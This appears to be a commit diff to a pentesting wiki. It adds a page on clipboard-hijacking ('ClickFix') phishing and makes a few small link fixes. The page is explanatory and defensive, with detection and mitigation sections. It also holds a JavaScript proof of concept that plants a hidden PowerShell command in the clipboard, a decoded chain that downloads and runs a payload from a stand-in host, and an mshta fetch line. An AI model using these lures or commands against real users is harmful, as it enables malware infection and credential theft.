Add content from: Fix the Click: Preventing the ClickFix Attack Vector

src/SUMMARY.md

@@ -28,6 +28,7 @@
   - [Enable Nexmon Monitor And Injection On Android](generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md)
   - [Evil Twin EAP-TLS](generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md)
 - [Phishing Methodology](generic-methodologies-and-resources/phishing-methodology/README.md)
+  - [Clipboard Hijacking](generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md)
   - [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
   - [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
   - [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md)

src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md

@@ -22,7 +22,7 @@ The same technique applies to any handset that has a publicly available NexMon p
 * NexMon Magisk ZIP or self-compiled patch providing:
   * `/system/lib*/libnexmon.so`
   * `/system/xbin/nexutil`
-* Hijacker ≥ 1.7 (arm/arm64) – https://github.com/chrisk44/Hijacker
+* Hijacker ≥ 1.7 (arm/arm64) – [https://github.com/chrisk44/Hijacker](https://github.com/chrisk44/Hijacker)
 * (Optional) Kali NetHunter or any Linux chroot where you intend to run wireless tools
 
 ---
@@ -130,4 +130,4 @@ Performance on the Galaxy S10 is comparable to external USB NICs (~20 dBm TX, 2-
 * [NexMon – firmware patching framework](https://github.com/seemoo-lab/nexmon)
 * [Hijacker (aircrack-ng GUI for Android)](https://github.com/chrisk44/Hijacker)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}

src/generic-methodologies-and-resources/phishing-methodology/README.md

@@ -458,6 +458,14 @@ You can **buy a domain with a very similar name** to the victims domain **and/or
 
 Use [**Phishious** ](https://github.com/Rices/Phishious)to evaluate if your email is going to end in the spam folder or if it's going to be blocked or successful.
 
+## Clipboard Hijacking / Pastejacking
+
+Attackers can silently copy malicious commands into the victim’s clipboard from a compromised or typosquatted web page and then trick the user to paste them inside **Win + R**, **Win + X** or a terminal window, executing arbitrary code without any download or attachment.
+
+{{#ref}}
+clipboard-hijacking.md
+{{#endref}}
+
 ## References
 
 - [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)

src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md

@@ -0,0 +1,96 @@
+# Clipboard Hijacking (Pastejacking) Attacks
+
+{{#include ../../banners/hacktricks-training.md}}
+
+> "Never paste anything you did not copy yourself." – old but still valid advice
+
+## Overview
+
+Clipboard hijacking – also known as *pastejacking* – abuses the fact that users routinely copy-and-paste commands without inspecting them. A malicious web page (or any JavaScript-capable context such as an Electron or Desktop application) programmatically places attacker-controlled text into the system clipboard. Victims are encouraged, normally by carefully crafted social-engineering instructions, to press **Win + R** (Run dialog), **Win + X** (Quick Access / PowerShell), or open a terminal and *paste* the clipboard content, immediately executing arbitrary commands.
+
+Because **no file is downloaded and no attachment is opened**, the technique bypasses most e-mail and web-content security controls that monitor attachments, macros or direct command execution. The attack is therefore popular in phishing campaigns delivering commodity malware families such as NetSupport RAT, Latrodectus loader or Lumma Stealer.
+
+## JavaScript Proof-of-Concept
+
+```html
+<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
+<button id="fix" onclick="copyPayload()">Fix the error</button>
+<script>
+function copyPayload() {
+  const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
+  navigator.clipboard.writeText(payload)
+    .then(() => alert('Now press  Win+R , paste and hit Enter to fix the problem.'));
+}
+</script>
+```
+
+Older campaigns used `document.execCommand('copy')`, newer ones rely on the asynchronous **Clipboard API** (`navigator.clipboard.writeText`).
+
+## The ClickFix / ClearFake Flow
+
+1. User visits a typosquatted or compromised site (e.g. `docusign.sa[.]com`)
+2. Injected **ClearFake** JavaScript calls an `unsecuredCopyToClipboard()` helper that silently stores a Base64-encoded PowerShell one-liner in the clipboard.
+3. HTML instructions tell the victim to: *“Press **Win + R**, paste the command and press Enter to resolve the issue.”*
+4. `powershell.exe` executes, downloading an archive that contains a legitimate executable plus a malicious DLL (classic DLL sideloading).
+5. The loader decrypts additional stages, injects shellcode and installs persistence (e.g. scheduled task) – ultimately running NetSupport RAT / Latrodectus / Lumma Stealer.
+
+### Example NetSupport RAT Chain
+
+```powershell
+powershell -nop -w hidden -enc <Base64>
+# ↓ Decodes to:
+Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
+Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
+%TEMP%\f\jp2launcher.exe             # Sideloads msvcp140.dll
+```
+
+* `jp2launcher.exe` (legitimate Java WebStart) searches its directory for `msvcp140.dll`.
+* The malicious DLL dynamically resolves APIs with **GetProcAddress**, downloads two binaries (`data_3.bin`, `data_4.bin`) via **curl.exe**, decrypts them using a rolling XOR key `"https://google.com/"`, injects the final shellcode and unzips **client32.exe** (NetSupport RAT) to `C:\ProgramData\SecurityCheck_v1\`.
+
+### Latrodectus Loader
+
+```
+powershell -nop -enc <Base64>  # Cloud Identificator: 2031
+```
+
+1. Downloads `la.txt` with **curl.exe**
+2. Executes the JScript downloader inside **cscript.exe**
+3. Fetches an MSI payload → drops `libcef.dll` besides a signed application → DLL sideloading → shellcode → Latrodectus.
+
+### Lumma Stealer via MSHTA
+
+```
+mshta https://iplogger.co/xxxx =+\\xxx
+```
+
+The **mshta** call launches a hidden PowerShell script that retrieves `PartyContinued.exe`, extracts `Boat.pst` (CAB), reconstructs `AutoIt3.exe` through `extrac32` & file concatenation and finally runs an `.a3x` script which exfiltrates browser credentials to `sumeriavgv.digital`.
+
+## Detection & Hunting
+
+Blue-teams can combine clipboard, process-creation and registry telemetry to pinpoint pastejacking abuse:
+
+* Windows Registry: `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` keeps a history of **Win + R** commands – look for unusual Base64 / obfuscated entries.
+* Security Event ID **4688** (Process Creation) where `ParentImage` == `explorer.exe` and `NewProcessName` in { `powershell.exe`, `wscript.exe`, `mshta.exe`, `curl.exe`, `cmd.exe` }.
+* Event ID **4663** for file creations under `%LocalAppData%\Microsoft\Windows\WinX\` or temporary folders right before the suspicious 4688 event.
+* EDR clipboard sensors (if present) – correlate `Clipboard Write` followed immediately by a new PowerShell process.
+
+## Mitigations
+
+1. Browser hardening – disable clipboard write-access (`dom.events.asyncClipboard.clipboardItem` etc.) or require user gesture.
+2. Security awareness – teach users to *type* sensitive commands or paste them into a text editor first.
+3. PowerShell Constrained Language Mode / Execution Policy + Application Control to block arbitrary one-liners.
+4. Network controls – block outbound requests to known pastejacking and malware C2 domains.
+
+## Related Tricks
+
+* **Discord Invite Hijacking** often abuses the same ClickFix approach after luring users into a malicious server:
+  {{#ref}}
+  discord-invite-hijacking.md
+  {{#endref}}
+
+## References
+
+- [Fix the Click: Preventing the ClickFix Attack Vector](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/)
+- [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking)
+
+{{#include ../../banners/hacktricks-training.md}}

src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md

@@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
 
 ### Automated dynamic analysis with MobSF (no jailbreak)
 
-[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
 
 ```bash
 docker pull opensecurity/mobile-security-framework-mobsf:latest

src/network-services-pentesting/pentesting-telnet.md

@@ -139,4 +139,4 @@ After a shell is obtained remember that **TTYs are usually dumb**; upgrade with
 
 
 
-{{#include /banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}